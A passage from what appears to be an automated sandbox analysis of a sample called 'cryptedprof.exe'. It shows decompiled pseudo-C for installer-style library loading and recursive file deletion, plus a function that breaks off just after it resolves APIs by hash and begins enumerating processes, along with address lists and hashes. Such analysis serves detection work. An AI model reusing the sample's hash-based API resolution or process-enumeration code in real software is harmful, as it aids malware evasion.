                                                                                        													 *__edi = __ebx;
                                                                                        													goto L103;
                                                                                        												}
                                                                                        												__eflags = __eax - 0x19;
                                                                                        												if(__eax <= 0x19) {
                                                                                        													goto L102;
                                                                                        												}
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											__eflags = __edx;
                                                                                        											if(__edx > 0) {
                                                                                        												goto L94;
                                                                                        											}
                                                                                        											goto L93;
                                                                                        										case 0x22:
                                                                                        											goto L57;
                                                                                        									}
                                                                                        								}
                                                                                        								_t271 = _t268 - 1;
                                                                                        								__eflags = _t271;
                                                                                        								if(_t271 == 0) {
                                                                                        									_v16 = _t282;
                                                                                        									goto L80;
                                                                                        								}
                                                                                        								__eflags = _t271 != 1;
                                                                                        								if(_t271 != 1) {
                                                                                        									goto L162;
                                                                                        								}
                                                                                        								__eflags = _t285 - 0x6e;
                                                                                        								if(__eflags > 0) {
                                                                                        									_t308 = _t285 - 0x72;
                                                                                        									__eflags = _t308;
                                                                                        									if(_t308 == 0) {
                                                                                        										_push(4);
                                                                                        										L74:
                                                                                        										_pop(_t273);
                                                                                        										L75:
                                                                                        										__eflags = _v8 - 1;
                                                                                        										if(_v8 != 1) {
                                                                                        											_t96 = _t329 + 0x810;
                                                                                        											 *_t96 =  *(_t329 + 0x810) &  !_t273;
                                                                                        											__eflags =  *_t96;
                                                                                        										} else {
                                                                                        											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
                                                                                        										}
                                                                                        										_v8 = 1;
                                                                                        										goto L57;
                                                                                        									}
                                                                                        									_t311 = _t308 - 1;
                                                                                        									__eflags = _t311;
                                                                                        									if(_t311 == 0) {
                                                                                        										_push(0x10);
                                                                                        										goto L74;
                                                                                        									}
                                                                                        									__eflags = _t311 != 0;
                                                                                        									if(_t311 != 0) {
                                                                                        										goto L57;
                                                                                        									}
                                                                                        									_push(0x40);
                                                                                        									goto L74;
                                                                                        								}
                                                                                        								if(__eflags == 0) {
                                                                                        									_push(8);
                                                                                        									goto L74;
                                                                                        								}
                                                                                        								_t314 = _t285 - 0x21;
                                                                                        								__eflags = _t314;
                                                                                        								if(_t314 == 0) {
                                                                                        									_v8 =  ~_v8;
                                                                                        									goto L57;
                                                                                        								}
                                                                                        								_t315 = _t314 - 0x11;
                                                                                        								__eflags = _t315;
                                                                                        								if(_t315 == 0) {
                                                                                        									_t273 = 0x100;
                                                                                        									goto L75;
                                                                                        								}
                                                                                        								_t316 = _t315 - 0x31;
                                                                                        								__eflags = _t316;
                                                                                        								if(_t316 == 0) {
                                                                                        									_t273 = 1;
                                                                                        									goto L75;
                                                                                        								}
                                                                                        								__eflags = _t316 != 0;
                                                                                        								if(_t316 != 0) {
                                                                                        									goto L57;
                                                                                        								}
                                                                                        								_push(0x20);
                                                                                        								goto L74;
                                                                                        							} else {
                                                                                        								_v32 = _t282;
                                                                                        								_v36 = _t282;
                                                                                        								goto L20;
                                                                                        							}
                                                                                        						}
                                                                                        						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
                                                                                        						if( *((char*)(_t320 - 1)) != 0x3a) {
                                                                                        							goto L17;
                                                                                        						}
                                                                                        						__eflags = _v32 - _t282;
                                                                                        						if(_v32 == _t282) {
                                                                                        							goto L43;
                                                                                        						}
                                                                                        						goto L17;
                                                                                        					}
                                                                                        					_t276 = _t257 - 5;
                                                                                        					if(_t276 == 0) {
                                                                                        						__eflags = _v44 - _t282;
                                                                                        						if(_v44 != _t282) {
                                                                                        							goto L43;
                                                                                        						} else {
                                                                                        							__eflags = _v36 - 3;
                                                                                        							_v32 = 1;
                                                                                        							_v8 = _t282;
                                                                                        							_v20 = _t282;
                                                                                        							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                        							_v40 = _t282;
                                                                                        							goto L20;
                                                                                        						}
                                                                                        					}
                                                                                        					_t280 = _t276 - 1;
                                                                                        					if(_t280 == 0) {
                                                                                        						__eflags = _v44 - _t282;
                                                                                        						if(_v44 != _t282) {
                                                                                        							goto L43;
                                                                                        						} else {
                                                                                        							_v32 = 2;
                                                                                        							_v8 = _t282;
                                                                                        							_v20 = _t282;
                                                                                        							goto L20;
                                                                                        						}
                                                                                        					}
                                                                                        					if(_t280 != 0x16) {
                                                                                        						goto L43;
                                                                                        					} else {
                                                                                        						_v32 = 3;
                                                                                        						_v8 = 1;
                                                                                        						goto L20;
                                                                                        					}
                                                                                        				}
                                                                                        				GlobalFree(_v56);
                                                                                        				GlobalFree(_v24);
                                                                                        				GlobalFree(_v48);
                                                                                        				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
                                                                                        					L182:
                                                                                        					return _t329;
                                                                                        				} else {
                                                                                        					_t224 =  *_t329 - 1;
                                                                                        					if(_t224 == 0) {
                                                                                        						_t187 = _t329 + 8; // 0x8
                                                                                        						_t323 = _t187;
                                                                                        						__eflags =  *_t323;
                                                                                        						if( *_t323 != 0) {
                                                                                        							_t225 = GetModuleHandleA(_t323); // executed
                                                                                        							__eflags = _t225 - _t282;
                                                                                        							 *(_t329 + 0x808) = _t225;
                                                                                        							if(_t225 != _t282) {
                                                                                        								L171:
                                                                                        								_t192 = _t329 + 0x408; // 0x408
                                                                                        								_t324 = _t192;
                                                                                        								_t226 = E709915C2( *(_t329 + 0x808), _t324);
                                                                                        								__eflags = _t226 - _t282;
                                                                                        								 *(_t329 + 0x80c) = _t226;
                                                                                        								if(_t226 == _t282) {
                                                                                        									__eflags =  *_t324 - 0x23;
                                                                                        									if( *_t324 == 0x23) {
                                                                                        										_t195 = _t329 + 0x409; // 0x409
                                                                                        										_t230 = E709912FE(_t195);
                                                                                        										__eflags = _t230 - _t282;
                                                                                        										if(_t230 != _t282) {
                                                                                        											__eflags = _t230 & 0xffff0000;
                                                                                        											if((_t230 & 0xffff0000) == 0) {
                                                                                        												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								__eflags = _v52 - _t282;
                                                                                        								if(_v52 != _t282) {
                                                                                        									L178:
                                                                                        									_t324[lstrlenA(_t324)] = 0x41;
                                                                                        									_t228 = E709915C2( *(_t329 + 0x808), _t324);
                                                                                        									__eflags = _t228 - _t282;
                                                                                        									if(_t228 != _t282) {
                                                                                        										L166:
                                                                                        										 *(_t329 + 0x80c) = _t228;
                                                                                        										goto L182;
                                                                                        									}
                                                                                        									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                        									L180:
                                                                                        									if(__eflags != 0) {
                                                                                        										goto L182;
                                                                                        									}
                                                                                        									L181:
                                                                                        									_t205 = _t329 + 4;
                                                                                        									 *_t205 =  *(_t329 + 4) | 0xffffffff;
                                                                                        									__eflags =  *_t205;
                                                                                        									goto L182;
                                                                                        								} else {
                                                                                        									__eflags =  *(_t329 + 0x80c) - _t282;
                                                                                        									if( *(_t329 + 0x80c) != _t282) {
                                                                                        										goto L182;
                                                                                        									}
                                                                                        									goto L178;
                                                                                        								}
                                                                                        							}
                                                                                        							_t233 = LoadLibraryA(_t323); // executed
                                                                                        							__eflags = _t233 - _t282;
                                                                                        							 *(_t329 + 0x808) = _t233;
                                                                                        							if(_t233 == _t282) {
                                                                                        								goto L181;
                                                                                        							}
                                                                                        							goto L171;
                                                                                        						}
                                                                                        						_t188 = _t329 + 0x408; // 0x408
                                                                                        						_t235 = E709912FE(_t188);
                                                                                        						 *(_t329 + 0x80c) = _t235;
                                                                                        						__eflags = _t235 - _t282;
                                                                                        						goto L180;
                                                                                        					}
                                                                                        					_t236 = _t224 - 1;
                                                                                        					if(_t236 == 0) {
                                                                                        						_t185 = _t329 + 0x408; // 0x408
                                                                                        						_t237 = _t185;
                                                                                        						__eflags =  *_t237;
                                                                                        						if( *_t237 == 0) {
                                                                                        							goto L182;
                                                                                        						}
                                                                                        						_t228 = E709912FE(_t237);
                                                                                        						L165:
                                                                                        						goto L166;
                                                                                        					}
                                                                                        					if(_t236 != 1) {
                                                                                        						goto L182;
                                                                                        					}
                                                                                        					_t81 = _t329 + 8; // 0x8
                                                                                        					_t283 = _t81;
                                                                                        					_t325 = E709912FE(_t81);
                                                                                        					 *(_t329 + 0x808) = _t325;
                                                                                        					if(_t325 == 0) {
                                                                                        						goto L181;
                                                                                        					}
                                                                                        					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
                                                                                        					 *((intOrPtr*)(_t329 + 0x850)) = E70991224(_t283);
                                                                                        					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
                                                                                        					 *((intOrPtr*)(_t329 + 0x848)) = 1;
                                                                                        					 *((intOrPtr*)(_t329 + 0x838)) = 1;
                                                                                        					_t90 = _t329 + 0x408; // 0x408
                                                                                        					_t228 =  *(_t325->i + E709912FE(_t90) * 4);
                                                                                        					goto L165;
                                                                                        				}
                                                                                        			}

                                                                                        0x70991bff
                                                                                        0x70991bff
                                                                                        0x70991c00
                                                                                        0x70991c08
                                                                                        0x70991c0c
                                                                                        0x70991c12
                                                                                        0x70991c16
                                                                                        0x00000000
                                                                                        0x70991c16
                                                                                        0x70991c02
                                                                                        0x70991c02
                                                                                        0x70991c03
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c05
                                                                                        0x70991c06
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c06
                                                                                        0x70991b96
                                                                                        0x70991b97
                                                                                        0x70991ba0
                                                                                        0x70991ba3
                                                                                        0x70991bb0
                                                                                        0x70991bb0
                                                                                        0x70991ba5
                                                                                        0x70991ba5
                                                                                        0x70991c7e
                                                                                        0x70991c81
                                                                                        0x70991c84
                                                                                        0x70991cf6
                                                                                        0x70991cfa
                                                                                        0x70991adc
                                                                                        0x00000000
                                                                                        0x70991adc
                                                                                        0x00000000
                                                                                        0x70991cfa
                                                                                        0x70991b94
                                                                                        0x70991b00
                                                                                        0x70991b03
                                                                                        0x70991b66
                                                                                        0x70991b69
                                                                                        0x70991b7a
                                                                                        0x70991b7a
                                                                                        0x70991b7d
                                                                                        0x70991c89
                                                                                        0x70991c8c
                                                                                        0x70991c8c
                                                                                        0x70991c8e
                                                                                        0x70992033
                                                                                        0x70992045
                                                                                        0x70992045
                                                                                        0x70992047
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992037
                                                                                        0x70992038
                                                                                        0x7099203b
                                                                                        0x7099203e
                                                                                        0x709920ba
                                                                                        0x709920c1
                                                                                        0x709920c6
                                                                                        0x709920c9
                                                                                        0x70991cf2
                                                                                        0x70991cf2
                                                                                        0x70991cf2
                                                                                        0x70991cf3
                                                                                        0x00000000
                                                                                        0x70991cf3
                                                                                        0x70992040
                                                                                        0x70992042
                                                                                        0x70992042
                                                                                        0x70992049
                                                                                        0x7099204b
                                                                                        0x709920ae
                                                                                        0x70991ce7
                                                                                        0x70991cea
                                                                                        0x70991ced
                                                                                        0x70991cf0
                                                                                        0x70991cf0
                                                                                        0x00000000
                                                                                        0x70991cf0
                                                                                        0x7099204d
                                                                                        0x7099204f
                                                                                        0x70992055
                                                                                        0x70992055
                                                                                        0x70992057
                                                                                        0x7099205a
                                                                                        0x7099206d
                                                                                        0x7099206d
                                                                                        0x70992070
                                                                                        0x70992073
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992075
                                                                                        0x70992078
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099207a
                                                                                        0x70992081
                                                                                        0x70992081
                                                                                        0x70992087
                                                                                        0x7099208a
                                                                                        0x709920a6
                                                                                        0x7099208c
                                                                                        0x70992095
                                                                                        0x70992098
                                                                                        0x70992098
                                                                                        0x00000000
                                                                                        0x7099208a
                                                                                        0x7099205c
                                                                                        0x7099205f
                                                                                        0x70992062
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992064
                                                                                        0x00000000
                                                                                        0x70992064
                                                                                        0x70992051
                                                                                        0x70992053
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992053
                                                                                        0x70991c94
                                                                                        0x70991c94
                                                                                        0x70991c95
                                                                                        0x70991dde
                                                                                        0x70991dde
                                                                                        0x70991de5
                                                                                        0x70991de8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991df5
                                                                                        0x00000000
                                                                                        0x70991fdb
                                                                                        0x70991fde
                                                                                        0x70991fe1
                                                                                        0x70991fe1
                                                                                        0x70991fe2
                                                                                        0x70991fe5
                                                                                        0x70991fe7
                                                                                        0x70991fe9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991feb
                                                                                        0x70991feb
                                                                                        0x70991fee
                                                                                        0x70992000
                                                                                        0x70992003
                                                                                        0x70992006
                                                                                        0x7099200c
                                                                                        0x00000000
                                                                                        0x7099200c
                                                                                        0x70991ff0
                                                                                        0x70991ff0
                                                                                        0x70991ff2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991ff4
                                                                                        0x70991ff6
                                                                                        0x70991ff8
                                                                                        0x70991ff8
                                                                                        0x70991ff8
                                                                                        0x70991ff9
                                                                                        0x70991ffb
                                                                                        0x70991ffd
                                                                                        0x70991fe1
                                                                                        0x70991fe2
                                                                                        0x70991fe5
                                                                                        0x70991fe7
                                                                                        0x70991fe9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991fe9
                                                                                        0x00000000
                                                                                        0x70991e3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e48
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e2f
                                                                                        0x70991e33
                                                                                        0x70991e37
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991fad
                                                                                        0x70991fb1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991fb7
                                                                                        0x70991fbf
                                                                                        0x70991fc6
                                                                                        0x70991fce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f15
                                                                                        0x70991f15
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e51
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099202b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f1d
                                                                                        0x70991f1f
                                                                                        0x70991f1f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099201b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099201f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992027
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f64
                                                                                        0x70991f66
                                                                                        0x70991f66
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f2f
                                                                                        0x70991f31
                                                                                        0x70991f31
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f41
                                                                                        0x70991f43
                                                                                        0x70991f43
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f72
                                                                                        0x70991f74
                                                                                        0x70991f74
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f4c
                                                                                        0x70991f4e
                                                                                        0x70991f4e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f53
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992023
                                                                                        0x7099202d
                                                                                        0x7099202d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f7d
                                                                                        0x70991f81
                                                                                        0x70991f86
                                                                                        0x70991f89
                                                                                        0x70991f8a
                                                                                        0x70991f8d
                                                                                        0x70991f93
                                                                                        0x70991f93
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992013
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f57
                                                                                        0x70991f57
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e58
                                                                                        0x70991e58
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f6b
                                                                                        0x70991f6d
                                                                                        0x70991f6d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991d67
                                                                                        0x70991d6d
                                                                                        0x70991d77
                                                                                        0x70991d7d
                                                                                        0x70991d85
                                                                                        0x70991d95
                                                                                        0x00000000
                                                                                        0x70991d95

                                                                                        APIs
                                                                                          • Part of subcall function 70991215: GlobalAlloc.KERNEL32(00000040,70991233,?,709912CF,-7099404B,709911AB,-000000A0), ref: 7099121D
                                                                                        • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 70991BC4
                                                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 70991C0C
                                                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 70991C16
                                                                                        • GlobalFree.KERNEL32 ref: 70991C29
                                                                                        • GlobalFree.KERNEL32 ref: 70991D09
                                                                                        • GlobalFree.KERNEL32 ref: 70991D0E
                                                                                        • GlobalFree.KERNEL32 ref: 70991D13
                                                                                        • GlobalFree.KERNEL32 ref: 70991EFA
                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 70992098
                                                                                        • GetModuleHandleA.KERNELBASE(00000008), ref: 70992114
                                                                                        • LoadLibraryA.KERNELBASE(00000008), ref: 70992125
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 7099217E
                                                                                        • lstrlenA.KERNEL32(00000408), ref: 70992198
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                        • String ID: Nxt
                                                                                        • API String ID: 245916457-3788892007
                                                                                        • Opcode ID: edc0389ecf1a22d82b6c5f4aac84a7ca59b5b8469aa6f4230c5c5590d305fd91
                                                                                        • Instruction ID: 0eb489f93b75c153dc6b26d6e6db38d16840880e50e366dcb4a34bccc71ed4ec
                                                                                        • Opcode Fuzzy Hash: edc0389ecf1a22d82b6c5f4aac84a7ca59b5b8469aa6f4230c5c5590d305fd91
                                                                                        • Instruction Fuzzy Hash: AC22AB71D2420ADFDB12CFA4C9807EDBBF9FB85304F20852ED1A6A6280D7745981CB5B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 98%
                                                                                        			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
                                                                                        				signed int _v8;
                                                                                        				void* _v12;
                                                                                        				signed int _v16;
                                                                                        				struct _WIN32_FIND_DATAA _v336;
                                                                                        				signed int _t40;
                                                                                        				char* _t53;
                                                                                        				signed int _t55;
                                                                                        				signed int _t58;
                                                                                        				signed int _t64;
                                                                                        				signed int _t66;
                                                                                        				void* _t68;
                                                                                        				signed char _t69;
                                                                                        				CHAR* _t71;
                                                                                        				void* _t72;
                                                                                        				CHAR* _t73;
                                                                                        				char* _t76;
                                                                                        
                                                                                        				_t69 = _a8;
                                                                                        				_t73 = _a4;
                                                                                        				_v8 = _t69 & 0x00000004;
                                                                                        				_t40 = E00405CD3(__eflags, _t73);
                                                                                        				_v16 = _t40;
                                                                                        				if((_t69 & 0x00000008) != 0) {
                                                                                        					_t66 = DeleteFileA(_t73); // executed
                                                                                        					asm("sbb eax, eax");
                                                                                        					_t68 =  ~_t66 + 1;
                                                                                        					 *0x42f4e8 =  *0x42f4e8 + _t68;
                                                                                        					return _t68;
                                                                                        				}
                                                                                        				_a4 = _t69;
                                                                                        				_t8 =  &_a4;
                                                                                        				 *_t8 = _a4 & 0x00000001;
                                                                                        				__eflags =  *_t8;
                                                                                        				if( *_t8 == 0) {
                                                                                        					L5:
                                                                                        					E0040624D(0x42b8c0, _t73);
                                                                                        					__eflags = _a4;
                                                                                        					if(_a4 == 0) {
                                                                                        						E00405C2C(_t73);
                                                                                        					} else {
                                                                                        						lstrcatA(0x42b8c0, "\*.*");
                                                                                        					}
                                                                                        					__eflags =  *_t73;
                                                                                        					if( *_t73 != 0) {
                                                                                        						L10:
                                                                                        						lstrcatA(_t73, 0x40a014);
                                                                                        						L11:
                                                                                        						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                        						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
                                                                                        						__eflags = _t40 - 0xffffffff;
                                                                                        						_v12 = _t40;
                                                                                        						if(_t40 == 0xffffffff) {
                                                                                        							L29:
                                                                                        							__eflags = _a4;
                                                                                        							if(_a4 != 0) {
                                                                                        								_t32 = _t71 - 1;
                                                                                        								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                        								__eflags =  *_t32;
                                                                                        							}
                                                                                        							goto L31;
                                                                                        						} else {
                                                                                        							goto L12;
                                                                                        						}
                                                                                        						do {
                                                                                        							L12:
                                                                                        							_t76 =  &(_v336.cFileName);
                                                                                        							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
                                                                                        							__eflags =  *_t53;
                                                                                        							if( *_t53 != 0) {
                                                                                        								__eflags = _v336.cAlternateFileName;
                                                                                        								if(_v336.cAlternateFileName != 0) {
                                                                                        									_t76 =  &(_v336.cAlternateFileName);
                                                                                        								}
                                                                                        							}
                                                                                        							__eflags =  *_t76 - 0x2e;
                                                                                        							if( *_t76 != 0x2e) {
                                                                                        								L19:
                                                                                        								E0040624D(_t71, _t76);
                                                                                        								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                        								if(__eflags == 0) {
                                                                                        									_t55 = E004059CD(__eflags, _t73, _v8);
                                                                                        									__eflags = _t55;
                                                                                        									if(_t55 != 0) {
                                                                                        										E00405374(0xfffffff2, _t73);
                                                                                        									} else {
                                                                                        										__eflags = _v8 - _t55;
                                                                                        										if(_v8 == _t55) {
                                                                                        											 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                        										} else {
                                                                                        											E00405374(0xfffffff1, _t73);
                                                                                        											E0040602C(_t72, _t73, 0);
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                                                        									if(__eflags == 0) {
                                                                                        										E00405A15(__eflags, _t73, _a8);
                                                                                        									}
                                                                                        								}
                                                                                        								goto L27;
                                                                                        							}
                                                                                        							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                        							__eflags = _t64;
                                                                                        							if(_t64 == 0) {
                                                                                        								goto L27;
                                                                                        							}
                                                                                        							__eflags = _t64 - 0x2e;
                                                                                        							if(_t64 != 0x2e) {
                                                                                        								goto L19;
                                                                                        							}
                                                                                        							__eflags =  *((char*)(_t76 + 2));
                                                                                        							if( *((char*)(_t76 + 2)) == 0) {
                                                                                        								goto L27;
                                                                                        							}
                                                                                        							goto L19;
                                                                                        							L27:
                                                                                        							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                        							__eflags = _t58;
                                                                                        						} while (_t58 != 0);
                                                                                        						_t40 = FindClose(_v12);
                                                                                        						goto L29;
                                                                                        					}
                                                                                        					__eflags =  *0x42b8c0 - 0x5c;
                                                                                        					if( *0x42b8c0 != 0x5c) {
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					goto L10;
                                                                                        				} else {
                                                                                        					__eflags = _t40;
                                                                                        					if(_t40 == 0) {
                                                                                        						L31:
                                                                                        						__eflags = _a4;
                                                                                        						if(_a4 == 0) {
                                                                                        							L39:
                                                                                        							return _t40;
                                                                                        						}
                                                                                        						__eflags = _v16;
                                                                                        						if(_v16 != 0) {
                                                                                        							_t40 = E004065C1(_t73);
                                                                                        							__eflags = _t40;
                                                                                        							if(_t40 == 0) {
                                                                                        								goto L39;
                                                                                        							}
                                                                                        							E00405BE5(_t73);
                                                                                        							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
                                                                                        							__eflags = _t40;
                                                                                        							if(_t40 != 0) {
                                                                                        								return E00405374(0xffffffe5, _t73);
                                                                                        							}
                                                                                        							__eflags = _v8;
                                                                                        							if(_v8 == 0) {
                                                                                        								goto L33;
                                                                                        							}
                                                                                        							E00405374(0xfffffff1, _t73);
                                                                                        							return E0040602C(_t72, _t73, 0);
                                                                                        						}
                                                                                        						L33:
                                                                                        						 *0x42f4e8 =  *0x42f4e8 + 1;
                                                                                        						return _t40;
                                                                                        					}
                                                                                        					__eflags = _t69 & 0x00000002;
                                                                                        					if((_t69 & 0x00000002) == 0) {
                                                                                        						goto L31;
                                                                                        					}
                                                                                        					goto L5;
                                                                                        				}
                                                                                        			}



















                                                                                        0x00405b20
                                                                                        0x00000000
                                                                                        0x00405b16
                                                                                        0x00405af7
                                                                                        0x00405afa
                                                                                        0x00405afc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405afe
                                                                                        0x00405b00
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405b02
                                                                                        0x00405b06
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405b61
                                                                                        0x00405b6b
                                                                                        0x00405b71
                                                                                        0x00405b71
                                                                                        0x00405b7c
                                                                                        0x00000000
                                                                                        0x00405b7c
                                                                                        0x00405a98
                                                                                        0x00405a9f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405a5d
                                                                                        0x00405a5d
                                                                                        0x00405a5f
                                                                                        0x00405b8c
                                                                                        0x00405b8e
                                                                                        0x00405b91
                                                                                        0x00405be2
                                                                                        0x00405be2
                                                                                        0x00405be2
                                                                                        0x00405b93
                                                                                        0x00405b96
                                                                                        0x00405ba1
                                                                                        0x00405ba6
                                                                                        0x00405ba8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405bab
                                                                                        0x00405bb7
                                                                                        0x00405bbc
                                                                                        0x00405bbe
                                                                                        0x00000000
                                                                                        0x00405bd9
                                                                                        0x00405bc0
                                                                                        0x00405bc3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405bc8
                                                                                        0x00000000
                                                                                        0x00405bcf
                                                                                        0x00405b98
                                                                                        0x00405b98
                                                                                        0x00000000
                                                                                        0x00405b98
                                                                                        0x00405a65
                                                                                        0x00405a68
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405a68

                                                                                        APIs
                                                                                        • DeleteFileA.KERNELBASE(?,?,747DFA90,747DF560,00000000), ref: 00405A3E
                                                                                        • lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405A86
                                                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405AA7
                                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405AAD
                                                                                        • FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,747DFA90,747DF560,00000000), ref: 00405ABE
                                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
                                                                                        • FindClose.KERNEL32(00000000), ref: 00405B7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $\*.*
                                                                                        • API String ID: 2035342205-371768168
                                                                                        • Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                        • Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
                                                                                        • Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
                                                                                        • Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E6FC2421B(void* __eflags, intOrPtr _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				void* _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				char _v544;
                                                                                        				void* _v580;
                                                                                        				struct tagPROCESSENTRY32W* _t25;
                                                                                        
                                                                                        				_v8 = E6FC24582();
                                                                                        				_v16 = E6FC2462A(_v8, 0xea31d3b6);
                                                                                        				_v20 = E6FC2462A(_v8, 0x5c7bf6e9);
                                                                                        				_v24 = E6FC2462A(_v8, 0x873d1860);
                                                                                        				_v12 = CreateToolhelp32Snapshot(2, 0);
                                                                                        				if(_v12 != 0xffffffff) {
                                                                                        					_v580 = 0x22c;
                                                                                        					_t25 =  &_v580;
                                                                                        					Process32FirstW(_v12, _t25);
